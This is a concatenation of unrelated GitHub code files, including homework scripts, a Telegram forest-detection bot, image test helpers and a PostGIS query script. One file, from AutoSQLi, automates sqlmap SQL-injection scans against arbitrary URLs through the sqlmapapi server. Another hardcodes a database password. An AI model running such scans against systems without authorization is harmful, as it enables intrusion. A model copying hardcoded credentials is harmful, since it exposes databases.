0\nvalidar = input('Enter the expression: ').split(')')\nfor pos, num in enumerate(validar):\n if '(' in validar[pos]:\n val1 += validar[pos].count('(')\n if validar[pos] == '' or ')' not in validar[pos]:\n if '(' not in validar[pos]:\n val2 += 1\n if val2 > 0 and val1 == 0:\n val1 = 0\n break \nprint(f'List = {validar}')\nprint('Valid expression!' if val1 == val2 else 'Invalid expression!')\n\"\"\"\n\n# Another approach #\nexpr = str(input('Enter the expression: '))\npilha = list()\nfor caract in expr:\n if caract == '(':\n pilha.append('(')\n elif caract == ')':\n if len(pilha) > 0:\n pilha.pop()\n else:\n pilha.append(')')\n break\nprint('Valid expression!' if len(pilha) == 0 else 'Invalid expression!')","repo_name":"Lu1zReis/exercicios-Python","sub_path":"testes e exercícios/exercicios/script_083.py","file_name":"script_083.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21345361472","text":"import numpy as np\r\nimport update # the updating method from Exercise 1.10\r\n\r\ntol=1e-3\r\n\r\ndata=np.random.random([5,3])\r\nA0=update.mean_and_SXY(data) # returns the result of one sweep of A (the matrix in 2.7.2), equivalent to sweeping A on pivot 0\r\n\r\ndef Sweep(A,k):\r\n '''A single sweep with pivot k'''\r\n # tolerance check for pivot k\r\n B=A.copy()\r\n if abs(A[k,k])<tol:\r\n print('2: k=',k, 'is a colinear variate. Delete k')\r\n raise ValueError\r\n # passed the tolerance check above\r\n B[:,k]/=-A[k,k] # column k\r\n for i in list(range(k))+list(range(k+1,len(A))):\r\n for j in list(range(k))+list(range(k+1,len(A))): # neither in row k nor in column k\r\n B[i,j]+=A[k,j]*B[i,k]\r\n B[k,]/=A[k,k] # row k\r\n B[k,k]=1/A[k,k]\r\n return B\r\n\r\n\r\ndef Sweep_whole(A,pivots):\r\n '''If A is invertible, return A^{-1}'''\r\n for i in pivots:\r\n try:\r\n A=Sweep(A,i)\r\n print('i=',i,'RSS=',A[-1,-1])\r\n except ValueError:\r\n print('A is not invertible.')\r\n break\r\n return A\r\n\r\ndef MyLinearRegression(data):\r\n A0=update.mean_and_SXY(data)\r\n Result=Sweep_whole(A0,range(1,len(A0)-1))\r\n print('Full-sweep result:',Result)\r\n beta=-Result[-1,:-1]\r\n MSE=Result[-1,-1]/(len(data)-len(A0)+1)\r\n R_squared=1-Result[-1,-1]/A0[-1,-1]\r\n se_beta=Result.diagonal()[:-1]\r\n return dict([('beta',beta),('MSE',MSE),('R-squared',R_squared),('se(beta)',se_beta)])\r\n\r\n\r\n\r\n\r\n# proofs of 2.7.4 and 2.7.5: see the homework write-up\r\n#2.7.6\r\nprint('Verify the inverse:',Sweep_whole(A0,range(len(A0))).dot(A0)) # should be the identity matrix\r\n\r\nfrom sklearn import linear_model # verify the result agrees with the standard library\r\nlm=linear_model.LinearRegression()\r\nlm.fit(data[:,:-1].reshape([-1,data.shape[1]-1]),data[:,-1])\r\nprint('Standard-library result:',lm.intercept_,lm.coef_,lm._residues)\r\n#print('Full-sweep result:',Sweep_whole(A0,range(1,len(A0)-1)))\r\nprint('Full-sweep result:',MyLinearRegression(data))\r\n\r\n\r\n\r\n","repo_name":"KillingVectorField/Homework-of-Regression-Analysis","sub_path":"HW1/Sweep.py","file_name":"Sweep.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40480714135","text":"# From AutoSQLi\n# Most parts of this file were taken from here:\n# https://github.com/Ekultek/Zeus-Scanner/blob/master/lib/attacks/sqlmap_scan/__init__.py\n# Thanks to Ekultek (https://github.com/Ekultek) !\n\nimport json\nimport re\nimport requests\nimport psutil\nimport time\nfrom multiprocessing import Process\n\nfrom autosqli.execute import execute\nfrom autosqli import log\n\n\ndef sqlmapapi_launch():\n \"\"\" launches sqlmapapi in another process and makes sure it launched \"\"\"\n\n def background():\n sta = execute(['python2.7', 'sqlmapapi.py', '-s'], 'sqlmap/', None,\n None)\n\n if 'Address already in use' in sta:\n log.critical('sqlmapapi.py said: {}'.format(sta))\n\n if 'bash' in sta:\n log.critical('bash error: {}'.format(sta))\n\n p = Process(target=background)\n p.start()\n\n time.sleep(5)\n\n if not is_sqlmapapi_launched():\n log.critical(\"sqlmapapi.py couldn't be launched\")\n\n\ndef is_sqlmapapi_launched():\n \"\"\" return True if sqlmapapi is launched, otherwise False \"\"\"\n launched = 'sqlmapapi.py' in str({p.pid: p.info for p in\n psutil.process_iter(attrs=['cmdline'])})\n\n return launched\n\n\ndef sqlmapapi_check():\n \"\"\" verify if sqlmapapi is launched, if not launch it \"\"\"\n log.info(\"Checking if 
sqlmapapi is already launched\")\n\n if not is_sqlmapapi_launched():\n log.info(\"Launching sqlmapapi\")\n sqlmapapi_launch()\n\n\ndef sqlmap_url(url, options):\n \"\"\" return sqlmap results for a specific url and specified options \"\"\"\n \"\"\" if there was an error, return None \"\"\"\n # check if sqlmapapi is available\n sqlmapapi_check()\n\n # create the new api interface\n sqlmap = SqlmapHook(url)\n\n # init a new scan ( create it, but don't launch it )\n sqlmap.init_new_scan()\n\n scan_id = sqlmap.get_scan_id()\n log.debug(\"Launching a sqlmap scan for {} (id: {})\".format(url, scan_id))\n log.debug(\"Options for {}: {}\".format(url, options))\n sqlmap.start_scan(scan_id, options)\n\n while True:\n time.sleep(1)\n logs, running = sqlmap.show_sqlmap_log(scan_id)\n\n if not running:\n return logs\n\n time.sleep(4)\n\n\ndef parse_report(report, target):\n \"\"\" add sqlmap report details to a given target \"\"\"\n log.debug(\"report: {}\".format(report))\n if 'CRITICAL' in report:\n if 'all tested parameters do not appear to be injectable.' in report:\n # The detection process was error-free but didn't found a SQLi\n target.set_vulnerability_status(False)\n else:\n # There was an error that we are too lazy to handle\n target.set_vulnerability_status(False)\n target.set_sqlmap_error(True)\n else:\n log.critical(\"not finished yetttt :(\")\n print('report:\\n\\n{}'.format(report))\n exit(69)\n\n target.set_sqlmap_logs(report)\n return target\n\n\ndef sqlmap_target(target, options):\n \"\"\" add sqlmap details to a Target and return it \"\"\"\n report = sqlmap_url(target.getUrl(), options)\n if report is None:\n log.critical(\"There was an error while scanning {}\".format(target.url))\n exit(1) # just to be sure\n\n target = parse_report(report, target)\n # TODO: finish this :)\n return target\n\n\nclass SqlmapHook(object):\n\n \"\"\"\n Sqlmap API hook, will process API requests, and output API data\n \"\"\"\n\n def __init__(self, to_scan, port=None, api_con=\"http://127.0.0.1:{}\",\n default_port=8775):\n self.to_scan = to_scan\n self.port = port or default_port\n self.headers = {\"Content-Type\": \"application/json\"}\n self.connection = api_con.format(self.port)\n self.commands = {\n \"init\": \"/task/new\",\n \"id\": \"/admin/0/list\",\n \"start\": \"/scan/{}/start\",\n \"status\": \"/scan/{}/status\",\n \"log\": \"/scan/{}/log\"\n }\n\n def init_new_scan(self):\n \"\"\"\n create a new API scan\n \"\"\"\n new_scan_url = \"{}{}\".format(self.connection, self.commands[\"init\"])\n try:\n results = requests.get(new_scan_url, params=self.headers)\n return results\n except Exception as e:\n log.critical(\"An error happenned in init_new_scan: {}\".format(e))\n return None\n\n def get_scan_id(self, split_by=16):\n \"\"\"\n get the ID of the current API scan\n \"\"\"\n # current_scan_id = None\n id_re = re.compile(r\"[a-fA-F0-9]{16}\")\n api_id_url = \"{}{}\".format(self.connection, self.commands[\"id\"])\n req = requests.get(api_id_url)\n to_check = str(json.loads(req.content)[\"tasks\"]).lower()\n return ''.join(id_re.findall(to_check))\n\n def start_scan(self, api_id, opts=None):\n \"\"\"\n start the API scan\n \"\"\"\n start_scan_url = \"{}{}\".format(\n self.connection,\n self.commands[\"start\"].format(api_id)\n )\n data_dict = {\"url\": self.to_scan}\n if opts is not None:\n for i in range(0, len(opts)):\n data_dict[opts[i][0]] = opts[i][1]\n post_data = json.dumps(data_dict)\n\n requests.post(\n start_scan_url,\n data=post_data,\n headers=self.headers\n )\n\n def 
show_sqlmap_log(self, api_id):\n \"\"\"show the sqlmap log\n return a tuple like this: (logs, is_running)\n \"\"\"\n\n running_status_url = \"{}{}\".format(\n self.connection,\n self.commands[\"status\"].format(api_id)\n )\n\n running_log_url = \"{}{}\".format(\n self.connection,\n self.commands[\"log\"].format(api_id)\n )\n\n status_req = requests.get(running_status_url)\n status_json = json.loads(status_req.content)\n current_status = status_json[\"status\"]\n\n is_running = True\n logs = ''\n\n if current_status != \"running\":\n log.debug(\"[scan: {}] scan isn't running: {}\".\n format(api_id, current_status))\n is_running = False\n\n current_status = json.loads(\n requests.get(running_status_url).content\n )[\"status\"]\n\n log_req = requests.get(running_log_url)\n log_json = json.loads(log_req.content)\n\n for i in range(0, len(log_json[\"log\"])):\n logs += log_json[\"log\"][i][\"message\"]\n\n return (logs, is_running)\n","repo_name":"clouedoc/AutoSQLi","sub_path":"autosqli/sqlmap_interface.py","file_name":"sqlmap_interface.py","file_ext":"py","file_size_in_byte":6427,"program_lang":"python","lang":"en","doc_type":"code","stars":258,"dataset":"github-code","pt":"61"} +{"seq_id":"41360887518","text":"import os\nimport tempfile\nimport unittest\nfrom typing import Any, Callable, Dict, List, Optional\n\nimport numpy as np\nfrom augly.tests import ImageAugConfig\nfrom augly.utils import pathmgr, TEST_URI\nfrom PIL import Image\n\n\ndef are_equal_images(a: Image.Image, b: Image.Image) -> bool:\n return a.size == b.size and np.allclose(np.array(a), np.array(b))\n\n\ndef are_equal_metadata(\n actual_meta: List[Dict[str, Any]],\n expected_meta: List[Dict[str, Any]],\n exclude_keys: Optional[List[str]],\n) -> bool:\n if actual_meta == expected_meta:\n return True\n\n for actual_dict, expected_dict in zip(actual_meta, expected_meta):\n for (act_k, act_v), (exp_k, exp_v) in zip(\n sorted(actual_dict.items(), key=lambda kv: kv[0]),\n sorted(expected_dict.items(), key=lambda kv: kv[0]),\n ):\n if exclude_keys is not None and act_k in exclude_keys:\n continue\n\n if act_k != exp_k:\n return False\n\n if act_v == exp_v:\n continue\n\n # Bboxes are tuples but stored as lists in expected metadata\n if (\n isinstance(act_v, list)\n and all(isinstance(x, tuple) for x in zip(act_v, exp_v))\n and len(act_v) == len(exp_v)\n and all(list(x) == y for x, y in zip(act_v, exp_v))\n ):\n continue\n\n \"\"\"\n Allow relative paths in expected metadata: just check that the end of the\n actual path matches the expected path\n \"\"\"\n if not (\n isinstance(act_v, str)\n and isinstance(exp_v, str)\n and act_v[-len(exp_v) :] == exp_v\n ):\n return False\n\n return True\n\n\nclass BaseImageUnitTest(unittest.TestCase):\n ref_img_dir = os.path.join(TEST_URI, \"image\", \"dfdc_expected_output\")\n\n def test_import(self) -> None:\n try:\n from augly import image as imaugs\n except ImportError:\n self.fail(\"imaugs failed to import\")\n self.assertTrue(dir(imaugs), \"Image directory does not exist\")\n\n @classmethod\n def setUpClass(cls):\n cls.maxDiff = None\n cls.config = ImageAugConfig(input_file_index=0)\n\n img_path, img_file = cls.config.get_input_path()\n cls.local_img_path = pathmgr.get_local_path(img_path)\n cls.img = Image.open(cls.local_img_path)\n\n def evaluate_function(self, aug_function: Callable[..., Image.Image], **kwargs):\n ref = self.get_ref_image(aug_function.__name__)\n\n with tempfile.NamedTemporaryFile(suffix=\".png\") as tmpfile:\n aug_function(self.local_img_path, output_path=tmpfile.name, 
**kwargs)\n file_dst = Image.open(tmpfile.name)\n\n pil_dst = aug_function(self.img, **kwargs)\n\n self.assertTrue(\n are_equal_images(pil_dst, ref), \"Expected and outputted images do not match\"\n )\n self.assertTrue(\n are_equal_images(file_dst, ref),\n \"Expected and outputted images do not match\",\n )\n\n def evaluate_class(\n self,\n transform_class: Callable[..., Image.Image],\n fname: str,\n metadata_exclude_keys: Optional[List[str]] = None,\n check_mode: bool = True,\n ):\n metadata = []\n bboxes, bbox_format = [(0.5, 0.5, 0.25, 0.75)], \"yolo\"\n ref = self.get_ref_image(fname)\n dst = transform_class(\n self.img, metadata=metadata, bboxes=bboxes, bbox_format=bbox_format\n )\n\n if check_mode:\n self.assertTrue(\n self.img.mode == dst.mode,\n \"Expected and outputted image modes do not match\",\n )\n\n self.assertTrue(\n are_equal_metadata(metadata, self.metadata[fname], metadata_exclude_keys),\n \"Expected and outputted metadata do not match\",\n )\n self.assertTrue(\n are_equal_images(dst, ref), \"Expected and outputted images do not match\"\n )\n\n def get_ref_image(self, fname: str) -> Image.Image:\n ref_img_name = f\"test_{fname}.png\"\n ref_local_path = pathmgr.get_local_path(\n os.path.join(self.ref_img_dir, ref_img_name)\n )\n return Image.open(ref_local_path)\n","repo_name":"facebookresearch/AugLy","sub_path":"augly/tests/image_tests/base_unit_test.py","file_name":"base_unit_test.py","file_ext":"py","file_size_in_byte":4288,"program_lang":"python","lang":"en","doc_type":"code","stars":4836,"dataset":"github-code","pt":"61"} +{"seq_id":"24059412761","text":"import urllib.request\nfrom forestbot.ml_backend.controller import Controller, Artifact\nfrom forestbot.front.image_analyzer.size_analyzer import is_correct_size\nfrom forestbot.satellite.satellite_data import download_rect\nfrom forestbot.satellite.osm_convert import generate_osm\nfrom forestbot.front.utils import *\nfrom threading import Thread, Lock\nfrom pathlib import Path\nimport telebot\nimport numpy as np\nimport configparser\nimport xml.etree.ElementTree as ET\nimport os\n\n\nclass ForestBot:\n \"\"\"\n Entity for interaction with Telegram users and their messages.\n \"\"\"\n max_attempts = 10 # Max number of attempts to send the result\n model_input_size = 224\n use_crop = True\n crop_size = 224\n default_radius_deg = convert_km_to_deg(2.0)\n max_radius_km = 7.0\n min_radius_km = 1.0\n default_threshold = 0.2\n out_date_time = 60 * 10 # in seconds\n min_photo_size = 200\n max_photo_size = 2000\n valid_formats = ['png', 'jpeg', 'jpg', 'bmp']\n min_download_size_to_notify = 5\n\n def __init__(self):\n config = configparser.ConfigParser()\n config.read(Path(\"credentials.ini\"))\n\n token = config['BOT']['bot_token']\n # TODO: save + load from save. make static?\n self.user_radiuses_deg = dict()\n self.user_thresholds = dict()\n self.bot = telebot.TeleBot(token)\n self.__init_messages()\n self.__add_handlers()\n self.controller = Controller(\n callback=self.__send_prediction_callback,\n model_input_size=ForestBot.model_input_size,\n use_crop=ForestBot.use_crop,\n crop_size=ForestBot.crop_size if ForestBot.use_crop else None\n )\n self.download_satellite_lock = Lock()\n self.download_satellite_queue_size = 0\n\n self.img_to_mask = dict()\n self.img_to_func = dict()\n\n Thread(target=self.controller.observe_updates).start()\n print(\"Bot is running\")\n\n def start(self) -> None:\n \"\"\"Start the bot. 
Thread will be captured\"\"\"\n self.bot.polling(none_stop=True)\n\n def __add_handlers(self) -> None:\n \"\"\"Method for initialize message handlers from Telegram bot\"\"\"\n\n @self.bot.message_handler(commands=['set_sensitivity'])\n def handle_threshold(message) -> None:\n words = message.text.split(' ')\n if len(words) != 2 or not is_float(words[1]) or not 0 < float(words[1]) < 1:\n self.send_text_message(chat_id=message.chat.id, text=self.wrong_threshold)\n else:\n # higher sensitivity => lower threshold\n new_threshold = 1 - float(words[1])\n self.user_thresholds[message.chat.id] = new_threshold\n self.send_text_message(message.chat.id, f\"Установлена новая чувствительность: {1 - new_threshold:.2f}\")\n\n @self.bot.message_handler(commands=['start'])\n def handle_start_message(message) -> None:\n self.send_text_message(message.chat.id, self.start_message)\n\n @self.bot.message_handler(commands=['help'])\n def handle_help_message(message) -> None:\n self.send_text_message(message.chat.id, self.help_message)\n\n @self.bot.message_handler(commands=['set_radius'])\n def handle_change_radius_message(message) -> None:\n\n success, custom_radius = get_radius_from_msg(\n message=message.text, min_value=ForestBot.min_radius_km, max_value=ForestBot.max_radius_km)\n\n if not success:\n self.send_text_message(message.chat.id, self.wrong_change_radius_message)\n else:\n self.user_radiuses_deg[message.chat.id] = convert_km_to_deg(custom_radius)\n self.send_text_message(message.chat.id,\n f\"Радиус снимка успешно установлен: {round(custom_radius, 2)} км\")\n\n @self.bot.message_handler(\n content_types=['audio', 'sticker', 'video', 'video_note', 'voice', 'contact', 'web_app_data'])\n def handle_other_types(message) -> None:\n self.send_text_message(message.chat.id, self.wrong_file_format_message)\n\n @self.bot.message_handler(content_types=['document'])\n @self.bot.message_handler(content_types=['photo'])\n def handle_photo_message(message) -> None:\n # Here we take only last image from the assumption that the user has sent only one picture\n # TODO: add processing of several photos in one message\n # TODO: move validation to another method\n if message.content_type == 'photo':\n file_id = message.photo[-1].file_id\n file_format = \"png\"\n\n else: # document\n file_id = message.document.file_id\n file_format = message.document.mime_type.split('/')[1]\n if not ForestBot.is_correct_format(file_format):\n self.send_text_message(message.chat.id, self.wrong_file_format_message)\n return\n\n file_info = self.bot.get_file(file_id)\n file_url = f'https://api.telegram.org/file/bot{self.bot.token}/{file_info.file_path}'\n\n if not is_correct_size(url=file_url, max_size=ForestBot.max_photo_size, min_size=ForestBot.min_photo_size):\n self.send_text_message(message.chat.id, self.wrong_size_message)\n return\n\n self.send_text_message(message.chat.id, self.accept_photo_message)\n image_name = generate_image_name(chat_id=message.chat.id, file_format=file_format)\n urllib.request.urlretrieve(file_url, f\"input_photos/{image_name}\")\n chat_id = message.chat.id\n\n # A pair of image and id is added to the processing queue\n self.controller.request_queue.put(\n Artifact(chat_id, image_name, self.user_thresholds.get(chat_id, self.default_threshold)))\n\n @self.bot.message_handler(content_types=['text'])\n def handle_text_cords_message(message) -> None:\n success, cords = get_cords_from_msg(message.text)\n if not success:\n self.send_text_message(message.chat.id, self.wrong_cords_message)\n else:\n 
self.__handle_cords_input(chat_id=message.chat.id, cords=cords)\n\n @self.bot.message_handler(content_types=['location'])\n def handle_location_message(message) -> None:\n self.__handle_cords_input(chat_id=message.chat.id,\n cords=(message.location.latitude, message.location.longitude))\n\n @self.bot.callback_query_handler(func=is_osm_call)\n def callback_for_osm(call):\n chat_id = call.from_user.id\n msg_id = call.message.message_id\n date = call.message.date\n\n if time.time() - date > ForestBot.out_date_time:\n self.bot.answer_callback_query(call.id, 'Сообщение устарело ⌛')\n self.send_text_message(chat_id, 'Похоже, прошло слишком много времени 😱\\n'\n 'Отправьте ваши координаты снова, а мы их обработаем 🚀')\n\n img_name = call.data.split()[1]\n mask = self.img_to_mask[img_name]\n func = self.img_to_func[img_name]\n\n self.bot.answer_callback_query(call.id, 'Принято 👍')\n self.bot.edit_message_reply_markup(chat_id=chat_id, message_id=msg_id, reply_markup=None)\n self.send_text_message(chat_id, \"Экспортируем результат в формат OSM...\")\n\n Thread(target=__send_osm, args=[chat_id, mask, func]).start()\n\n def __send_osm(chat_id, mask, func) -> None:\n \"\"\"\n Method to generate and send .osm file to user.\n :param chat_id: user id\n :param mask: predicted mask\n :param func: function for converting coordinates\n \"\"\"\n\n def send_document(chat_id, document):\n Thread(target=send_document_with_retry, kwargs={\n 'bot': self.bot,\n 'chat_id': chat_id,\n 'document': document,\n 'max_attempts': ForestBot.max_attempts\n }).start()\n\n file_name = f\"{round(time.time() * 100000)}.osm\"\n file_path = Path(f'osm/{file_name}')\n result = generate_osm(mask, func)\n\n with open(file_path, 'w') as f:\n ET.ElementTree(result).write(f, encoding='unicode', xml_declaration=True)\n\n f = open(file_path, 'rb')\n send_document(chat_id=chat_id, document=f)\n\n @self.bot.callback_query_handler(func=is_processing_call)\n def callback_for_processing_choice(call):\n msg_id = call.message.message_id\n chat_id = call.from_user.id\n answer, image_name = call.data.split()\n date = call.message.date\n\n self.bot.edit_message_reply_markup(chat_id=chat_id, message_id=msg_id, reply_markup=None)\n\n if answer == 'y':\n if time.time() - date > ForestBot.out_date_time:\n self.bot.answer_callback_query(call.id, 'Сообщение устарело ⌛')\n self.send_text_message(chat_id, 'Похоже, прошло слишком много времени 😱\\n'\n 'Отправьте ваши координаты снова, а мы их обработаем 🚀')\n else:\n self.bot.answer_callback_query(call.id, 'Принято 👍')\n self.send_text_message(chat_id, 'Начинаем поиск 🔍')\n self.controller.request_queue.put(\n Artifact(chat_id, image_name, self.user_thresholds.get(chat_id, self.default_threshold)))\n else:\n self.bot.answer_callback_query(call.id, 'Отмена 🚫')\n self.send_text_message(chat_id, 'Поиск отменен. 
Хотите изучить другую местность ?🤗'\n '\\nПросто отправьте координаты или снимок!')\n\n def __handle_cords_input(self, chat_id, cords) -> None:\n \"\"\"\n Method to process coordinates\n :param chat_id: user id\n :param cords: extracted coordinates from geoteg or text message\n \"\"\"\n Thread(target=self.__send_loading_animation_message, kwargs={'chat_id': chat_id}).start()\n image_name = generate_image_name(chat_id)\n radius = self.user_radiuses_deg.get(chat_id, ForestBot.default_radius_deg)\n self.download_satellite_queue_size += 1\n Thread(\n target=self.__download_satellite,\n kwargs={\n 'image_name': image_name,\n 'cords': cords,\n 'radius': radius,\n 'download_dir': Path(\"input_photos\"),\n 'chat_id': chat_id\n }\n ).start()\n\n def __send_loading_animation_message(self, chat_id: int) -> None:\n \"\"\"\n Method to show cool rotating globe in message\n :param chat_id: user id\n \"\"\"\n states = ['🌍', '🌎', '🌏']\n message_text = \"Ваши координаты приняты. Загружаем снимок \"\n msg = self.bot.send_message(chat_id, message_text + states[0])\n if self.download_satellite_queue_size > ForestBot.min_download_size_to_notify:\n self.send_text_message(chat_id,\n f\"В данный момент нам поступило достаточно много запросов на загрузку снимков.\\n\"\n f\"Номер вашего запроса в очереди: {self.download_satellite_queue_size}\")\n for i in range(1, 124):\n try:\n self.bot.edit_message_text(message_text + states[i % 3], chat_id, msg.id)\n except Exception as e:\n time.sleep(3)\n time.sleep(0.5)\n\n def __download_satellite(self, image_name, cords, radius, download_dir, chat_id) -> None:\n \"\"\"\n Method to download satellite image on disk.\n \"\"\"\n with self.download_satellite_lock:\n try:\n transform_func = download_rect(image_name=image_name, center=cords, radius=radius,\n download_dir=download_dir)\n self.img_to_func[image_name] = transform_func\n self.__send_image_with_retry(\n result_path=download_dir / image_name,\n chat_id=chat_id,\n delete_result=False,\n caption=f'Снимок местности по вашим координатам:\\n{cords[0]}, {cords[1]}\\n',\n reply_markup=generate_buttons_continue(image_name)\n )\n except Exception as ex:\n print(f\"Failed to load satellite images:\\n{ex}\")\n self.send_text_message(chat_id, \"Не удалось обнаружить спутниковые снимки в данном районе. 
Похоже, \"\n \"Вы - отважный путешественник, раз решили отправиться туда!\")\n finally:\n self.download_satellite_queue_size -= 1\n\n def __init_messages(self) -> None:\n \"\"\"Loads basic messages from files.\"\"\"\n msg_path = Path(\"forestbot/front/messages\")\n\n with open(msg_path / \"start_message.txt\", encoding=\"UTF-8\") as f:\n self.start_message = f.read()\n\n with open(msg_path / \"accept_photo_message.txt\", encoding=\"UTF-8\") as f:\n self.accept_photo_message = f.read()\n\n with open(msg_path / \"ready_img_message.txt\", encoding=\"UTF-8\") as f:\n self.ready_img_message = f.read()\n\n with open(msg_path / \"failed_to_send_img_message.txt\", encoding=\"UTF-8\") as f:\n self.failed_to_send_message = f.read()\n\n with open(msg_path / \"wrong_cords_message.txt\", encoding=\"UTF-8\") as f:\n self.wrong_cords_message = f.read()\n\n with open(msg_path / \"wrong_file_format_message.txt\", encoding=\"UTF-8\") as f:\n self.wrong_file_format_message = f.read()\n\n with open(msg_path / \"wrong_size_message.txt\", encoding=\"UTF-8\") as f:\n self.wrong_size_message = f.read()\n\n with open(msg_path / \"help_message.txt\", encoding=\"UTF-8\") as f:\n self.help_message = f.read()\n\n with open(msg_path / \"wrong_threshold.txt\", encoding=\"UTF-8\") as f:\n self.wrong_threshold = f.read()\n\n self.wrong_change_radius_message = \"Для изменения радиуса снимка используйте команду таким образом:\\n\" \\\n \"/set_radius \" \\\n f\"{{число в пределах \" \\\n f\"[{ForestBot.min_radius_km}, {ForestBot.max_radius_km}]}}\\n\\n\" \\\n \"Пример:\\n/set_radius 2.5\"\n\n def __send_prediction_callback(self, result_path: Path, chat_id: int, mask: np.ndarray, image_name=None) -> None:\n \"\"\"\n Callback for completed prediction.\n :param Path result_path: path to the result image\n :param int chat_id: chat id\n \"\"\"\n self.img_to_mask[image_name] = mask\n Thread(\n target=self.__send_image_with_retry,\n kwargs={\n 'result_path': result_path,\n 'chat_id': chat_id,\n 'delete_result': True,\n 'reply_markup': generate_buttons_osm(image_name) if image_name in self.img_to_func else None\n }\n ).start()\n\n def __send_image_with_retry(self, result_path: Path, chat_id: int, attempt: int = 0, caption: str = \"Готово!🥳\",\n delete_result: bool = False, **kwargs) -> None:\n \"\"\"\n Method for sending the processed image. Applies multiple retries on failed submission.\n :param Path result_path: path to the image\n :param int chat_id: chat id\n :param int attempt: attempt number (starts from 0)\n :param str caption: (optional) text message\n \"\"\"\n try:\n # Try to read and send result\n with open(result_path, 'rb') as result:\n self.bot.send_photo(chat_id=chat_id, photo=result, caption=caption, **kwargs)\n if delete_result:\n try:\n os.remove(result_path)\n os.remove(Path('input_photos') / result_path.name)\n except Exception as e:\n print(e)\n except Exception as exception:\n print(\n f\"Attempt {attempt}/{ForestBot.max_attempts} failed. Trying again...\\n\"\n f\"Chat id = {chat_id},\\npath={result_path}\\n{exception}\\n\\n\"\n )\n\n if attempt < ForestBot.max_attempts:\n # Do another attempt with delay\n time.sleep(1)\n self.__send_image_with_retry(result_path=result_path, chat_id=chat_id, attempt=attempt + 1,\n caption=caption, **kwargs)\n else:\n # Maximum number of attempts made. 
Ask user to retry\n print('=' * 10, f\"\\nFailed to send\\nchat_id = {chat_id}\\nimg = {result_path}\\n\", '=' * 10, sep='')\n try:\n os.remove(result_path)\n except Exception as e:\n print(e)\n try:\n # Try to ask user for retry if it is possible\n self.send_text_message(chat_id, self.failed_to_send_message)\n except Exception as exception:\n print('=' * 10, f\"\\nLost connection with chat id = {chat_id}\\n{exception}\\n\", '=' * 10, sep='')\n else:\n if attempt:\n print(\n f\"!!!\\nSuccessfully send by {attempt}th attempt.\\nChat id = {chat_id}, img = {result_path}\\n!!!\\n\")\n\n def send_text_message(self, chat_id: int, text: str) -> None:\n Thread(target=send_text_message_with_retry, kwargs={\n 'bot': self.bot, 'chat_id': chat_id, 'text': text, 'max_attempts': ForestBot.max_attempts\n }).start()\n\n @classmethod\n def is_image_size_correct(cls, photo) -> bool:\n return (cls.min_photo_size <= photo[-1].width <= cls.max_photo_size) and (\n cls.min_photo_size <= photo[-1].height <= cls.max_photo_size)\n\n @classmethod\n def is_correct_format(cls, file_format: str) -> bool:\n return file_format in cls.valid_formats\n","repo_name":"WinstonDovlatov/ForestBot","sub_path":"forestbot/front/forest_bot.py","file_name":"forest_bot.py","file_ext":"py","file_size_in_byte":19041,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"817527562","text":"import cv2 as cv\nfrom src.algorithms.BaseKeypointAlgorithm import BaseKeypointAlgorithm\nfrom timeit import default_timer as timer\n\nclass SIFT(BaseKeypointAlgorithm):\n def __init__(self, parts, images, topMatches=20, drawMatches=True, iteration=None):\n super().__init__(parts, images, topMatches, drawMatches, iteration)\n self.bf = cv.BFMatcher(cv.NORM_L2, crossCheck=True)\n self.sift = cv.xfeatures2d.SIFT_create()\n\n def calculateDescriptor(self, img):\n t = timer()\n keypoints, descriptors = self.sift.detectAndCompute(img, None)\n t = timer() - t\n\n return keypoints, descriptors, t\n\n\n","repo_name":"sMteX/DiplomaThesis","sub_path":"src/algorithms/SIFT.py","file_name":"SIFT.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10503485819","text":"import psycopg2\n\nclass Point:\n def __init__(self, id, arrivetime, leavetime):\n self.id = id\n self.arrivetime = arrivetime\n self.leavetime = leavetime\n\n\ndef resetInterestingExhibits():\n print(\"RESETTING PREVIOUS RESULTS\")\n cur = conn.cursor()\n\n\n people = [57, 67, 68]\n for p in people:\n cur.execute(\"drop table if exists exhibits_person_\" + str(p))\n\n\n conn.commit()\n cur.close()\n\ndef interestingExhibits(n_person):\n print(\"FINDING INTERESTING EXHIBITS FOR PERSON \", n_person)\n cur = conn.cursor()\n\n cur.execute('create table if not exists exhibits_person_'+ str(n_person) + ''' as (\n SELECT p.id as pointId, e.id as exhibitId, p.geom as point, p.arrivtime, p.leavetime, e.geom as geom\n FROM exhibits_on_tables as e, (\n select p.geom, min(st_distance(p.geom, e.geom))as min ''' + \n 'from stay_points_'+ str(n_person) + ''' as p, exhibits_on_tables as e\n group by p.geom ''' + \n ') as i JOIN stay_points_'+ str(n_person) + ''' as p ON p.geom = i.geom\n where st_distance(p.geom, e.geom) = i.min \n and st_distance(p.geom, e.geom) < 1)''')\n\n conn.commit()\n cur.close()\n\n# Connect to your postgres DB\nprint(\"Connecting to database...\")\nconn = psycopg2.connect(\"dbname=GDMD user=postgres 
password=khliabub\")\nresetInterestingExhibits()\n\npeople = [57, 67, 68]\nfor p in people:\n interestingExhibits(p)\n","repo_name":"marcoincerti/stay-points-detection-museum","sub_path":"interestingExhibits.py","file_name":"interestingExhibits.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6721235532","text":"from django.shortcuts import render\nfrom pdb import set_trace as bp\nfrom django.http import HttpResponse\nimport json\nfrom django.views.decorators.csrf import csrf_exempt\nfrom insurance.models import (\n NAIC_Sub_Industry_Code_11, \n NAIC_Sub_Industry_Code_54, \n EO_Pricing_Model_Deductible,\n EO_Pricing_Model_Limit,\n EO_Pricing_Model_Base_Rate, \n EO_Pricing_Model_Marginal, \n Errors_Omissions_Policy_Details, \n Hazard_Rate_Multiplier, \n NAIC_Industry_Code, \n NAIC_Sub_Industry_Hazard_Rating )\nfrom insurance.lib.helper import getBaseRate\n\n# Create your views here.\ndef index(request):\n # return HttpResponse('Hello from insurance')\n\n return render(request, 'insurance/index.html', {\n 'title': 'Latest policies'\n })\n\n# sub_industry = 